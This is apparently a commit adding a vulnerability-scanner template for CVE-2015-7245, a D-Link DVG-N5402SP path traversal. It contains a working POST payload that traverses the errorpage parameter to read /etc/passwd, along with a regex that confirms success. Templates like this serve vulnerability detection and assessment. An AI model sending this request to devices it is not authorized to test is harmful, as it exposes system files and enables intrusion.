Create CVE-2015-7245.yaml
parent
98b85a139f
commit
ca25ff1b39
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2015-7245
|
||||
|
||||
info:
|
||||
name: D-Link DVG-N5402SP - Path Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
tags: cve,cve2015,dlink,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2015-7245
|
||||
cwe-id: CWE-22
|
||||
description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
|
||||
reference:
|
||||
- https://www.cvedetails.com/cve/CVE-2015-7245
|
||||
- https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/cgibin/webproc"
|
||||
|
||||
body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
Loading…
Reference in New Issue